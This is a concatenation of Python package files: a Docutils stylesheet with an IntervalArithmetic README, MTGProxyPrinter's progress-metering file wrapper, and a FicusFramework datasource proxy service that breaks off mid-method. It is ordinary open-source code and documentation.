:Author: David Goodger ([email protected])
:Id: $Id: html4css1.css 7952 2016-07-26 18:15:59Z milde $
:Copyright: This stylesheet has been placed in the public domain.
Default cascading style sheet for the HTML output of Docutils.
See http://docutils.sf.net/docs/howto/html-stylesheets.html for how to
customize this style sheet.
*/
/* used to remove borders from tables and images */
.borderless, table.borderless td, table.borderless th {
border: 0 }
table.borderless td, table.borderless th {
/* Override padding for "table.docutils td" with "! important".
The right padding separates the table cells. */
padding: 0 0.5em 0 0 ! important }
.first {
/* Override more specific margin styles with "! important". */
margin-top: 0 ! important }
.last, .with-subtitle {
margin-bottom: 0 ! important }
.hidden {
display: none }
.subscript {
vertical-align: sub;
font-size: smaller }
.superscript {
vertical-align: super;
font-size: smaller }
a.toc-backref {
text-decoration: none ;
color: black }
blockquote.epigraph {
margin: 2em 5em ; }
dl.docutils dd {
margin-bottom: 0.5em }
object[type="image/svg+xml"], object[type="application/x-shockwave-flash"] {
overflow: hidden;
}
/* Uncomment (and remove this text!) to get bold-faced definition list terms
dl.docutils dt {
font-weight: bold }
*/
div.abstract {
margin: 2em 5em }
div.abstract p.topic-title {
font-weight: bold ;
text-align: center }
div.admonition, div.attention, div.caution, div.danger, div.error,
div.hint, div.important, div.note, div.tip, div.warning {
margin: 2em ;
border: medium outset ;
padding: 1em }
div.admonition p.admonition-title, div.hint p.admonition-title,
div.important p.admonition-title, div.note p.admonition-title,
div.tip p.admonition-title {
font-weight: bold ;
font-family: sans-serif }
div.attention p.admonition-title, div.caution p.admonition-title,
div.danger p.admonition-title, div.error p.admonition-title,
div.warning p.admonition-title, .code .error {
color: red ;
font-weight: bold ;
font-family: sans-serif }
/* Uncomment (and remove this text!) to get reduced vertical space in
compound paragraphs.
div.compound .compound-first, div.compound .compound-middle {
margin-bottom: 0.5em }
div.compound .compound-last, div.compound .compound-middle {
margin-top: 0.5em }
*/
div.dedication {
margin: 2em 5em ;
text-align: center ;
font-style: italic }
div.dedication p.topic-title {
font-weight: bold ;
font-style: normal }
div.figure {
margin-left: 2em ;
margin-right: 2em }
div.footer, div.header {
clear: both;
font-size: smaller }
div.line-block {
display: block ;
margin-top: 1em ;
margin-bottom: 1em }
div.line-block div.line-block {
margin-top: 0 ;
margin-bottom: 0 ;
margin-left: 1.5em }
div.sidebar {
margin: 0 0 0.5em 1em ;
border: medium outset ;
padding: 1em ;
background-color: #ffffee ;
width: 40% ;
float: right ;
clear: right }
div.sidebar p.rubric {
font-family: sans-serif ;
font-size: medium }
div.system-messages {
margin: 5em }
div.system-messages h1 {
color: red }
div.system-message {
border: medium outset ;
padding: 1em }
div.system-message p.system-message-title {
color: red ;
font-weight: bold }
div.topic {
margin: 2em }
h1.section-subtitle, h2.section-subtitle, h3.section-subtitle,
h4.section-subtitle, h5.section-subtitle, h6.section-subtitle {
margin-top: 0.4em }
h1.title {
text-align: center }
h2.subtitle {
text-align: center }
hr.docutils {
width: 75% }
img.align-left, .figure.align-left, object.align-left, table.align-left {
clear: left ;
float: left ;
margin-right: 1em }
img.align-right, .figure.align-right, object.align-right, table.align-right {
clear: right ;
float: right ;
margin-left: 1em }
img.align-center, .figure.align-center, object.align-center {
display: block;
margin-left: auto;
margin-right: auto;
}
table.align-center {
margin-left: auto;
margin-right: auto;
}
.align-left {
text-align: left }
.align-center {
clear: both ;
text-align: center }
.align-right {
text-align: right }
/* reset inner alignment in figures */
div.align-right {
text-align: inherit }
/* div.align-center * { */
/* text-align: left } */
.align-top {
vertical-align: top }
.align-middle {
vertical-align: middle }
.align-bottom {
vertical-align: bottom }
ol.simple, ul.simple {
margin-bottom: 1em }
ol.arabic {
list-style: decimal }
ol.loweralpha {
list-style: lower-alpha }
ol.upperalpha {
list-style: upper-alpha }
ol.lowerroman {
list-style: lower-roman }
ol.upperroman {
list-style: upper-roman }
p.attribution {
text-align: right ;
margin-left: 50% }
p.caption {
font-style: italic }
p.credits {
font-style: italic ;
font-size: smaller }
p.label {
white-space: nowrap }
p.rubric {
font-weight: bold ;
font-size: larger ;
color: maroon ;
text-align: center }
p.sidebar-title {
font-family: sans-serif ;
font-weight: bold ;
font-size: larger }
p.sidebar-subtitle {
font-family: sans-serif ;
font-weight: bold }
p.topic-title {
font-weight: bold }
pre.address {
margin-bottom: 0 ;
margin-top: 0 ;
font: inherit }
pre.literal-block, pre.doctest-block, pre.math, pre.code {
margin-left: 2em ;
margin-right: 2em }
pre.code .ln { color: grey; } /* line numbers */
pre.code, code { background-color: #eeeeee }
pre.code .comment, code .comment { color: #5C6576 }
pre.code .keyword, code .keyword { color: #3B0D06; font-weight: bold }
pre.code .literal.string, code .literal.string { color: #0C5404 }
pre.code .name.builtin, code .name.builtin { color: #352B84 }
pre.code .deleted, code .deleted { background-color: #DEB0A1}
pre.code .inserted, code .inserted { background-color: #A3D289}
span.classifier {
font-family: sans-serif ;
font-style: oblique }
span.classifier-delimiter {
font-family: sans-serif ;
font-weight: bold }
span.interpreted {
font-family: sans-serif }
span.option {
white-space: nowrap }
span.pre {
white-space: pre }
span.problematic {
color: red }
span.section-subtitle {
/* font-size relative to parent (h1..h6 element) */
font-size: 80% }
table.citation {
border-left: solid 1px gray;
margin-left: 1px }
table.docinfo {
margin: 2em 4em }
table.docutils {
margin-top: 0.5em ;
margin-bottom: 0.5em }
table.footnote {
border-left: solid 1px black;
margin-left: 1px }
table.docutils td, table.docutils th,
table.docinfo td, table.docinfo th {
padding-left: 0.5em ;
padding-right: 0.5em ;
vertical-align: top }
table.docutils th.field-name, table.docinfo th.docinfo-name {
font-weight: bold ;
text-align: left ;
white-space: nowrap ;
padding-left: 0 }
/* "booktabs" style (no vertical lines) */
table.docutils.booktabs {
border: 0px;
border-top: 2px solid;
border-bottom: 2px solid;
border-collapse: collapse;
}
table.docutils.booktabs * {
border: 0px;
}
table.docutils.booktabs th {
border-bottom: thin solid;
text-align: left;
}
h1 tt.docutils, h2 tt.docutils, h3 tt.docutils,
h4 tt.docutils, h5 tt.docutils, h6 tt.docutils {
font-size: 100% }
ul.auto-toc {
list-style-type: none }
</style>
</head>
<body>
<div class="document" id="intervalarithmetic">
<h1 class="title">IntervalArithmetic</h1>
<!-- -*- Mode: rst -*- -->
<!-- -*- Mode: rst -*- -->
<!-- |IntervalArithmeticUrl|
|IntervalArithmeticHomePage|_
|IntervalArithmeticDoc|_
|IntervalArithmetic@github|_
|IntervalArithmetic@readthedocs|_
|IntervalArithmetic@readthedocs-badge|
|IntervalArithmetic@pypi|_ -->
<!-- .. _IntervalArithmetic@github: https://github.com/FabriceSalvaire/python-interval-arithmetic -->
<!-- .. _IntervalArithmetic@pypi: https://pypi.python.org/pypi/IntervalArithmetic -->
<!-- coverage test -->
<!-- https://img.shields.io/pypi/status/Django.svg -->
<!-- https://img.shields.io/github/stars/badges/shields.svg?style=social&label=Star -->
<!-- End -->
<!-- -*- Mode: rst -*- -->
<!-- End -->
<p><a class="reference external" href="https://pypi.python.org/pypi/IntervalArithmetic"><object data="https://img.shields.io/pypi/l/IntervalArithmetic.svg" type="image/svg+xml">IntervalArithmetic license</object></a>
<a class="reference external" href="https://pypi.python.org/pypi/IntervalArithmetic"><object data="https://img.shields.io/pypi/pyversions/IntervalArithmetic.svg" type="image/svg+xml">IntervalArithmetic python version</object></a></p>
<p><a class="reference external" href="https://pypi.python.org/pypi/IntervalArithmetic"><object data="https://img.shields.io/pypi/v/IntervalArithmetic.svg" type="image/svg+xml">IntervalArithmetic last version</object></a></p>
<ul class="simple">
<li>Quick Link to <a class="reference external" href="https://github.com/FabriceSalvaire/python-interval-arithmetic/tree/master">Production Branch</a></li>
<li>Quick Link to <a class="reference external" href="https://github.com/FabriceSalvaire/python-interval-arithmetic/tree/devel">Devel Branch</a></li>
</ul>
<div class="section" id="overview">
<h1>Overview</h1>
<div class="section" id="what-is-intervalarithmetic">
<h2>What is IntervalArithmetic?</h2>
<p>IntervalArithmetic is a free and open source interval arithmetic package for <a class="reference external" href="http://python.org">Python</a>.</p>
</div>
<div class="section" id="where-is-the-documentation">
<h2>Where is the Documentation?</h2>
<p>The documentation is available on the <a class="reference external" href="https://fabricesalvaire.github.io/python-interval-arithmetic">IntervalArithmetic Home Page</a>.</p>
<!-- What are the main features ?
- - - - - - - - - - - - - - - - - - - - - - - - - - - -
* to be completed ... -->
</div>
<div class="section" id="how-to-install-it">
<h2>How to install it?</h2>
<p>Look at the <a class="reference external" href="https://fabricesalvaire.github.io/IntervalArithmetic/installation.html">installation</a> section in the documentation.</p>
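<p>Assuming a standard PyPI setup, it can typically be installed with:</p>
<pre class="literal-block">
pip install IntervalArithmetic
</pre>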
</div>
</div>
<div class="section" id="credits">
<h1>Credits</h1>
<p>Authors: <a class="reference external" href="http://fabrice-salvaire.fr">Fabrice Salvaire</a></p>
</div>
<div class="section" id="news">
<h1>News</h1>
<!-- -*- Mode: rst -*- -->
<!-- no title here -->
<div class="section" id="v0-2-2017-11-10">
<h2>V0.2 2017-11-10</h2>
</div>
</div>
</div>
</body>
</html> | PypiClean |
/MTGProxyPrinter-0.25.0.tar.gz/MTGProxyPrinter-0.25.0/mtg_proxy_printer/metered_file.py |
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from typing import Iterable, List, Optional, BinaryIO, Union
from io import BufferedIOBase
from PyQt5.QtCore import QObject, pyqtSignal as Signal
from delegateto import delegate
from mtg_proxy_printer.logger import get_logger
logger = get_logger(__name__)
del get_logger
__all__ = [
"MeteredFile",
]
WrappedIoType = Union[BufferedIOBase, BinaryIO]
@delegate(
"file",
# IOBase and BufferedIOBase methods
"seekable", "readable", "writable", "close", "fileno", "flush", "isatty", "tell", "truncate", "detach", # noqa
)
class MeteredFile(QObject):
"""
Takes a file-like object and monitors read and write progress.
"""
io_begin = Signal(int)
total_bytes_processed = Signal(int)
io_end = Signal()
def __init__(self, file: WrappedIoType, expected_size_bytes: int = 0, parent: QObject = None):
logger.debug(f"Creating {self.__class__.__name__} instance.")
super(MeteredFile, self).__init__(parent)
self.file = file
self._total_bytes_processed = 0
self.expected_size_bytes = expected_size_bytes
logger.debug(f"Created {self.__class__.__name__} instance.")
def __enter__(self):
self.io_begin.emit(self.expected_size_bytes)
return self
def __exit__(self, exc_type, exc_val, exc_tb) -> Optional[bool]:
try:
result = self.file.__exit__(exc_type, exc_val, exc_tb)
finally:
self.io_end.emit()
return result
def _processed(self, byte_count: int):
self._total_bytes_processed += byte_count
self.total_bytes_processed.emit(self._total_bytes_processed)
    def seek(self, __offset: int, __whence: int = 0) -> int:
        # Delegate to the wrapped file; seek() returns the new absolute
        # position, which is correct for every whence value (unlike __offset).
        position = self.file.seek(__offset, __whence)
        self._total_bytes_processed = position
        self.total_bytes_processed.emit(self._total_bytes_processed)
        return position
def read(self, __size: Optional[int] = None) -> bytes:
buffer = self.file.read(__size)
self._processed(len(buffer))
return buffer
    def read1(self, __size: int = -1) -> bytes:
buffer = self.file.read1(__size)
self._processed(len(buffer))
return buffer
def readinto(self, __buffer) -> int:
bytes_read = self.file.readinto(__buffer)
self._processed(bytes_read)
return bytes_read
def readinto1(self, __buffer) -> int:
bytes_read = self.file.readinto1(__buffer)
self._processed(bytes_read)
return bytes_read
def readline(self, __size: Optional[int] = None) -> bytes:
line = self.file.readline(__size)
self._processed(len(line))
return line
def readlines(self, __hint: int = None) -> List[bytes]:
lines = self.file.readlines(__hint)
total_bytes = sum(map(len, lines))
self._processed(total_bytes)
return lines
def write(self, __buffer) -> int:
bytes_written = self.file.write(__buffer)
self._processed(bytes_written)
return bytes_written
def writelines(self, __lines: Iterable[bytes]) -> None:
def _monitor(__lines: Iterable[bytes]):
for line in __lines:
yield line
self._processed(len(line))
self.file.writelines(_monitor(__lines)) | PypiClean |
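

if __name__ == "__main__":
    # Minimal usage sketch (illustrative only): "example.bin" is a placeholder
    # path. Direct (non-queued) signal connections work without a Qt event loop.
    import os

    path = "example.bin"
    total = os.path.getsize(path)
    with open(path, "rb") as raw:
        metered = MeteredFile(raw, expected_size_bytes=total)
        metered.total_bytes_processed.connect(
            lambda done: print(f"{done}/{total} bytes processed"))
        # Each read() emits total_bytes_processed with the running byte count.
        while metered.read(64 * 1024):
            pass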
/FicusFramework-3.1.0.post2.tar.gz/FicusFramework-3.1.0.post2/src/factdatasource/FactDatasourceProxyService.py | import logging
from abc import abstractmethod
import requests
from munch import Munch
from api.exceptions import ServiceInnerException, IllegalArgumentException, AuthException
from api.model.FactDatasourceQueryParameter import FactDatasourceQueryParameter
from client import check_instance_avaliable, do_service
from config.annotation import Value
from factdatasource.FactDatasourceContext import FactDatasourceContext
from factdatasource.FactDatasourceContextHolder import FactDatasourceContextHolder
from libs import HeaderHolder
from libs.utils import Singleton
from service.FactDatasourceService import FactDatasourceService
log = logging.getLogger('Ficus')
class FactDatasourceProxy(object):
@abstractmethod
def fd(self, fd_code: str):
"""
        Return the fd object.
:param fd_code:
:return: FactDatasource
"""
@abstractmethod
def size(self, fd_code: str):
"""
        Return the total number of records.
        :param fd_code:
        :return: the number of records (long)
"""
@abstractmethod
def is_empty(self, fd_code: str):
"""
        Return whether any data exists.
:param fd_code:
:return: boolean
"""
@abstractmethod
def collect(self, fd_code: str, offset: int, size: int, only_model_field: bool):
"""
        Return the specified number of records.
        :param offset:
        :param only_model_field:
        :param fd_code:
        :param size: the number of records to return
:return: list
"""
@abstractmethod
def collect_conditions(self, fd_code: str, offset: int, size: int, condition_groups: list, only_model_field: bool):
"""
        Return the records matching the given query conditions.
        :param offset:
        :param only_model_field:
        :param fd_code:
        :param size: the number of records to return
        :param condition_groups: the query conditions
:return: list
"""
@abstractmethod
def query(self, fd_code: str, query: str, parameters: dict):
"""
        Query data with a query statement.
        :param fd_code:
        :param query: the query statement
        :param parameters: the query parameters
:return: Page
"""
@abstractmethod
def query_data(self, fd_code: str, query: str, parameters: dict):
"""
        Query data with a query statement.
        :param fd_code:
        :param query: the query statement
        :param parameters: the query parameters
:return: Page
"""
@abstractmethod
def inserts(self, fd_code: str, result_list: list) -> list:
"""
        Insert data in bulk; the fields of each list item must map one-to-one to the database fields.
        :param fd_code:
        :param result_list: the data to insert
:return:
"""
@abstractmethod
def updates(self, fd_code: str, result_list: list) -> list:
"""
        Update data in bulk; the fields of each list item must map one-to-one to the database fields.
        Uses the ByPrimaryKeySelective approach: the primary key is required, and every other non-null field is updated.
        :param fd_code:
        :param result_list: the data to update
:return:
"""
@abstractmethod
def save_or_updates(self, fd_code: str, result_list: list) -> list:
"""
        Save-or-update data in bulk; the fields of each list item must map one-to-one to the database fields.
        Uses the ByPrimaryKeySelective approach: the primary key is required, and every other non-null field is updated.
        :param fd_code:
        :param result_list: the data to insert or update
:return:
"""
@abstractmethod
def delete_all(self, fd_code: str):
"""
        Delete all data.
:param fd_code:
:return:
"""
@abstractmethod
def delete(self, fd_code: str, query: str):
"""
        Delete data with a delete statement; query is the complete delete statement.
:param fd_code:
:param query:
:return:
"""
@abstractmethod
def delete_conditions(self, fd_code: str, condition_groups: list):
"""
        Build a delete statement from the given delete conditions.
:param fd_code:
:param condition_groups:
:return:
"""
# @abstractmethod
# def get_fact_datasource_fields(self, fd_code: str):
# """
    #     Not needed by the Python version yet, so left unimplemented.
    #     Get the fields of the fd.
# :param fd_code:
# :return: List<FactDatasourceField>
# """
@abstractmethod
def exists_fds(self, fd_codes: list) -> bool:
"""
        Check whether the fds exist.
:param fd_codes:
:return:
"""
class DistributedFactDatasourceProxy(FactDatasourceProxy, Singleton):
"""
    Local mode: operate the database directly through the FD.
"""
def fd(self, fd_code: str):
"""
        Return the fd object.
:param fd_code:
:return: FactDatasource
"""
return self._get_fd_context(HeaderHolder.get_value(HeaderHolder.SITE), HeaderHolder.get_value(HeaderHolder.PROJECT_CODE), fd_code).fd()
def size(self, fd_code: str):
"""
        Return the total number of records.
        :param fd_code:
        :return: the number of records (long)
"""
fd_context = self._get_fd_context(HeaderHolder.get_value(HeaderHolder.SITE), HeaderHolder.get_value(HeaderHolder.PROJECT_CODE),fd_code)
self._inner_check_permission(fd_context, 'read')
return fd_context.size()
def is_empty(self, fd_code: str):
"""
        Return whether any data exists.
:param fd_code:
:return: boolean
"""
fd_context = self._get_fd_context(HeaderHolder.get_value(HeaderHolder.SITE), HeaderHolder.get_value(HeaderHolder.PROJECT_CODE),fd_code)
self._inner_check_permission(fd_context, 'read')
return fd_context.is_empty()
def collect(self, fd_code: str, offset: int, size: int, only_model_field: bool = False):
"""
        Return the specified number of records.
        :param offset:
        :param only_model_field:
        :param fd_code:
        :param size: the number of records to return
:return: list
"""
fd_context = self._get_fd_context(HeaderHolder.get_value(HeaderHolder.SITE), HeaderHolder.get_value(HeaderHolder.PROJECT_CODE),fd_code)
self._inner_check_permission(fd_context, 'read')
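        # NOTE: offset is accepted by this method but not forwarded to fd_context.collect here.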
result = fd_context.collect(size)
        # Field filtering must be applied to the query result here
self._inner_field_permission(fd_context, result, only_model_field)
return result
def collect_conditions(self, fd_code: str, offset: int, size: int, condition_groups: list, only_model_field: bool = False):
"""
        Return the records matching the given query conditions.
        :param offset:
        :param only_model_field:
        :param fd_code:
        :param size: the number of records to return
        :param condition_groups: the query conditions
:return: list
"""
fd_context = self._get_fd_context(HeaderHolder.get_value(HeaderHolder.SITE), HeaderHolder.get_value(HeaderHolder.PROJECT_CODE),fd_code)
self._inner_check_permission(fd_context, 'read')
result = fd_context.collect_conditions(size, condition_groups)
        # Field filtering must be applied to the query result here
self._inner_field_permission(fd_context, result, only_model_field)
return result
def query(self, fd_code: str, query: str, parameters: dict):
"""
        Query data with a query statement.
        :param fd_code:
        :param query: the query statement
        :param parameters: the query parameters
:return: Page
"""
fd_context = self._get_fd_context(HeaderHolder.get_value(HeaderHolder.SITE), HeaderHolder.get_value(HeaderHolder.PROJECT_CODE),fd_code)
self._inner_check_permission(fd_context, 'read')
result = fd_context.query(query, parameters)
        # Field filtering must be applied to the query result here
self._inner_field_permission(fd_context, result, False)
return result
def query_data(self, fd_code: str, query: str, parameters: dict):
        return self.query(fd_code, query, parameters)
def inserts(self, fd_code: str, result_list: list) -> list:
"""
        Insert data in bulk; the fields of each list item must map one-to-one to the database fields.
        :param fd_code:
        :param result_list: the data to insert
:return:
"""
fd_context = self._get_fd_context(HeaderHolder.get_value(HeaderHolder.SITE), HeaderHolder.get_value(HeaderHolder.PROJECT_CODE),fd_code)
self._inner_check_permission(fd_context, 'write')
return fd_context.inserts(result_list)
def updates(self, fd_code: str, result_list: list) -> list:
"""
        Update data in bulk; the fields of each list item must map one-to-one to the database fields.
        Uses the ByPrimaryKeySelective approach: the primary key is required, and every other non-null field is updated.
        :param fd_code:
        :param result_list: the data to update
:return:
"""
fd_context = self._get_fd_context(HeaderHolder.get_value(HeaderHolder.SITE), HeaderHolder.get_value(HeaderHolder.PROJECT_CODE),fd_code)
self._inner_check_permission(fd_context, 'write')
return fd_context.updates(result_list)
def save_or_updates(self, fd_code: str, result_list: list) -> list:
"""
        Save-or-update data in bulk; the fields of each list item must map one-to-one to the database fields.
        Uses the ByPrimaryKeySelective approach: the primary key is required, and every other non-null field is updated.
        :param fd_code:
        :param result_list: the data to insert or update
:return:
"""
fd_context = self._get_fd_context(HeaderHolder.get_value(HeaderHolder.SITE), HeaderHolder.get_value(HeaderHolder.PROJECT_CODE),fd_code)
self._inner_check_permission(fd_context, 'write')
return fd_context.inserts_or_updates(result_list)
def delete_all(self, fd_code: str):
"""
        Delete all data.
:param fd_code:
:return:
"""
fd_context = self._get_fd_context(HeaderHolder.get_value(HeaderHolder.SITE), HeaderHolder.get_value(HeaderHolder.PROJECT_CODE),fd_code)
self._inner_check_permission(fd_context, 'delete')
return fd_context.delete_all()
def delete(self, fd_code: str, query: str):
"""
        Delete data with a delete statement; query is the complete delete statement.
:param fd_code:
:param query:
:return:
"""
fd_context = self._get_fd_context(HeaderHolder.get_value(HeaderHolder.SITE), HeaderHolder.get_value(HeaderHolder.PROJECT_CODE),fd_code)
self._inner_check_permission(fd_context, 'delete')
return fd_context.delete(query)
def delete_conditions(self, fd_code: str, condition_groups: list):
"""
        Build a delete statement from the given delete conditions.
        :param fd_code:
        :param condition_groups: a list of ConditionGroup objects
:return:
"""
fd_context = self._get_fd_context(HeaderHolder.get_value(HeaderHolder.SITE), HeaderHolder.get_value(HeaderHolder.PROJECT_CODE),fd_code)
self._inner_check_permission(fd_context, 'delete')
return fd_context.delete_conditions(condition_groups)
# def get_fact_datasource_fields(self, fd_code: str):
# """
    #     Get the fields of the fd.
# :param fd_code:
# :return: List<FactDatasourceField>
# """
# fd_context = self._get_fd_context(fd_code)
# self._inner_check_permission(fd_context, 'execute')
# return fd_context.get_fact_datasource_fields()
def exists_fds(self, fd_codes: list) -> bool:
"""
        Check whether the fds exist.
:param fd_codes:
:return:
"""
if not fd_codes:
return False
if not isinstance(fd_codes, list):
raise IllegalArgumentException("检测fd是否存在失败,输入参数不是一个list")
fd_service = FactDatasourceService.instance()
return fd_service.exists_fds(HeaderHolder.get_value(HeaderHolder.SITE),
HeaderHolder.get_value(HeaderHolder.PROJECT_CODE), fd_codes)
def _get_fd_context(self, site: str, project_code: str, fd_code: str):
fd_context: FactDatasourceContext = FactDatasourceContextHolder.instance().get_fact_datasource(site,project_code,fd_code)
return fd_context
def _inner_check_permission(self, fd_context: FactDatasourceContext, operation: str):
        # TODO content-level permission checks are not implemented yet
return True
def _inner_field_permission(self, fd_context, result, only_model_field):
        # TODO content-level permission checks and model-field filtering are not implemented yet
return True
class CentralizedFactDatasourceProxy(FactDatasourceProxy, Singleton):
"""
    Centralized mode: the traditional approach of calling ficus-web to obtain the fd.
"""
def fd(self, fd_code: str):
"""
        Get a specific FD object.
        :param fd_code: the unique code of the fd
        :return: the FD object
"""
check_instance_avaliable()
try:
r = do_service(f"/remote/fd-service/{fd_code}",headers={HeaderHolder.SITE:HeaderHolder.get_value(HeaderHolder.SITE),HeaderHolder.PROJECT_CODE:HeaderHolder.get_value(HeaderHolder.PROJECT_CODE)})
if r is not None:
return Munch(r)
else:
return None
except requests.exceptions.HTTPError as e:
if e.response.status_code == 500:
                # The server reported an internal error
                raise ServiceInnerException(e.response._content.decode('utf-8'))
            elif e.response.status_code >= 400 and e.response.status_code < 500 and e.response.status_code != 404:
                # An authentication-related error
                raise AuthException(f"Server-side error {str(e)} {e.response._content.decode('utf-8')}")
raise e
def size(self, fd_code: str):
"""
        Get the number of records.
        :param fd_code: the unique code of the fd
        :return: the number of records, or 0 if there are none
"""
check_instance_avaliable()
try:
r = do_service(f"/remote/fd-service/{fd_code}/size",headers={HeaderHolder.SITE:HeaderHolder.get_value(HeaderHolder.SITE),HeaderHolder.PROJECT_CODE:HeaderHolder.get_value(HeaderHolder.PROJECT_CODE)})
if r is not None:
return r
else:
return 0
except requests.exceptions.HTTPError as e:
if e.response.status_code == 500:
                # The server reported an internal error
                raise ServiceInnerException(e.response._content.decode('utf-8'))
            elif e.response.status_code >= 400 and e.response.status_code < 500 and e.response.status_code != 404:
                # An authentication-related error
                raise AuthException(f"Server-side error {str(e)} {e.response._content.decode('utf-8')}")
raise e
def is_empty(self, fd_code: str):
"""
        Check whether the dataset is empty.
        :param fd_code: the unique code of the fd
        :return: True if empty, otherwise False
"""
check_instance_avaliable()
try:
r = do_service(f"/remote/fd-service/{fd_code}/empty",headers={HeaderHolder.SITE:HeaderHolder.get_value(HeaderHolder.SITE),HeaderHolder.PROJECT_CODE:HeaderHolder.get_value(HeaderHolder.PROJECT_CODE)})
if r is not None:
return r
else:
return True
except requests.exceptions.HTTPError as e:
if e.response.status_code == 500:
                # The server reported an internal error
                raise ServiceInnerException(e.response._content.decode('utf-8'))
            elif e.response.status_code >= 400 and e.response.status_code < 500 and e.response.status_code != 404:
                # An authentication-related error
                raise AuthException(f"Server-side error {str(e)} {e.response._content.decode('utf-8')}")
raise e
def collect(self, fd_code: str, offset: int, size: int, only_model_field: bool = False):
"""
        Return the whole dataset.
        :param offset:
        :param only_model_field: whether to return only the fields defined in the model
        :param size:
        :param fd_code: the unique code of the fd
:return:
"""
check_instance_avaliable()
try:
r = do_service(f"/remote/fd-service/{fd_code}/all", params={'offset': offset, 'size': size, 'onlyModelField': only_model_field},headers={HeaderHolder.SITE:HeaderHolder.get_value(HeaderHolder.SITE),HeaderHolder.PROJECT_CODE:HeaderHolder.get_value(HeaderHolder.PROJECT_CODE)})
if r is not None:
if isinstance(r, list):
return [Munch(x) for x in r]
else:
return Munch(r)
else:
return None
except requests.exceptions.HTTPError as e:
if e.response.status_code == 500:
                # The server reported an internal error
                raise ServiceInnerException(e.response._content.decode('utf-8'))
            elif e.response.status_code >= 400 and e.response.status_code < 500 and e.response.status_code != 404:
                # An authentication-related error
                raise AuthException(f"Server-side error {str(e)} {e.response._content.decode('utf-8')}")
raise e
def collect_conditions(self, fd_code: str, offset: int, size: int, condition_groups: list, only_model_field: bool = False):
"""
        Return the records matching the given query conditions.
        :param offset:
        :param only_model_field:
        :param fd_code:
        :param size: the number of records to return
        :param condition_groups: the query conditions
:return: list
"""
check_instance_avaliable()
try:
r = do_service(f"/remote/fd-service/{fd_code}/conditions", method="post", data=condition_groups,
params={'offset': offset, 'size': size, 'onlyModelField': only_model_field},headers={HeaderHolder.SITE:HeaderHolder.get_value(HeaderHolder.SITE),HeaderHolder.PROJECT_CODE:HeaderHolder.get_value(HeaderHolder.PROJECT_CODE)})
if r is not None:
if isinstance(r, list):
return [Munch(x) for x in r]
else:
return Munch(r)
else:
return None
except requests.exceptions.HTTPError as e:
if e.response.status_code == 500:
                # The server reported an internal error
                raise ServiceInnerException(e.response._content.decode('utf-8'))
            elif e.response.status_code >= 400 and e.response.status_code < 500 and e.response.status_code != 404:
                # An authentication-related error
                raise AuthException(f"Server-side error {str(e)} {e.response._content.decode('utf-8')}")
raise e
def query(self, fd_code: str, query: str, parameters: dict):
"""
        Query the dataset.
        :param fd_code: the unique code of the fd
        :param query: the query statement
        :param parameters: parameters the query may use, as key/value pairs
:return:
"""
check_instance_avaliable()
try:
r = do_service(f"/remote/fd-service/{fd_code}/query", method="post", data=parameters,
params={'query': query},headers={HeaderHolder.SITE:HeaderHolder.get_value(HeaderHolder.SITE),HeaderHolder.PROJECT_CODE:HeaderHolder.get_value(HeaderHolder.PROJECT_CODE)})
if r is not None:
if isinstance(r, list):
return [Munch(x) for x in r]
else:
return Munch(r)
else:
return None
except requests.exceptions.HTTPError as e:
if e.response.status_code == 500:
                # The server reported an internal error
                raise ServiceInnerException(e.response._content.decode('utf-8'))
            elif e.response.status_code >= 400 and e.response.status_code < 500 and e.response.status_code != 404:
                # An authentication-related error
                raise AuthException(f"Server-side error {str(e)} {e.response._content.decode('utf-8')}")
raise e
def query_data(self, fd_code: str, query: str, parameters: dict):
"""
        Query the dataset.
        :param fd_code: the unique code of the fd
        :param query: the query statement
        :param parameters: parameters the query may use, as key/value pairs
:return:
"""
check_instance_avaliable()
query_parameter = FactDatasourceQueryParameter(query, parameters)
try:
r = do_service(f"/remote/fd-service/{fd_code}/queryData", method="post", data=dict(query_parameter),headers={HeaderHolder.SITE:HeaderHolder.get_value(HeaderHolder.SITE),HeaderHolder.PROJECT_CODE:HeaderHolder.get_value(HeaderHolder.PROJECT_CODE)})
if r is not None:
if isinstance(r, list):
return [Munch(x) for x in r]
else:
return Munch(r)
else:
return None
except requests.exceptions.HTTPError as e:
if e.response.status_code == 500:
                # The server reported an internal error
                raise ServiceInnerException(e.response._content.decode('utf-8'))
            elif e.response.status_code >= 400 and e.response.status_code < 500 and e.response.status_code != 404:
                # An authentication-related error
                raise AuthException(f"Server-side error {str(e)} {e.response._content.decode('utf-8')}")
raise e
def inserts(self, fd_code: str, result_list: list) -> list:
"""
        Insert data.
        :param fd_code: the unique code of the fd
        :param result_list: the data to write, as a list
:return:
"""
if result_list is None:
return None
if not isinstance(result_list, list):
raise IllegalArgumentException("输入的参数:result_list 不是数组")
check_instance_avaliable()
request = []
for result in result_list:
if not isinstance(result, Munch):
                # Append values of any other type as-is
                request.append(result)
            else:
                # It is a Munch, so convert it to a plain dict
request.append(result.toDict())
try:
r = do_service(f"/remote/fd-service/{fd_code}", method="post", data=request, return_type="json",headers={HeaderHolder.SITE:HeaderHolder.get_value(HeaderHolder.SITE),HeaderHolder.PROJECT_CODE:HeaderHolder.get_value(HeaderHolder.PROJECT_CODE)})
if r is not None:
if isinstance(r, list):
return [Munch(x) for x in r]
else:
return None
else:
return None
except requests.exceptions.HTTPError as e:
if e.response.status_code == 500:
                # The server reported an internal error
                raise ServiceInnerException(e.response._content.decode('utf-8'))
            elif e.response.status_code >= 400 and e.response.status_code < 500:
                # An authentication-related error
                raise AuthException(f"Server-side error {str(e)} {e.response._content.decode('utf-8')}")
raise e
def updates(self, fd_code: str, result_list: list) -> list:
"""
        Update data.
        :param fd_code: the unique code of the fd
        :param result_list: the data to update, as a list
:return:
"""
if result_list is None:
return None
if not isinstance(result_list, list):
raise IllegalArgumentException("输入的参数:result_list 不是数组")
check_instance_avaliable()
request = []
for result in result_list:
if not isinstance(result, Munch):
                # Append values of any other type as-is
                request.append(result)
            else:
                # It is a Munch, so convert it to a plain dict
request.append(result.toDict())
try:
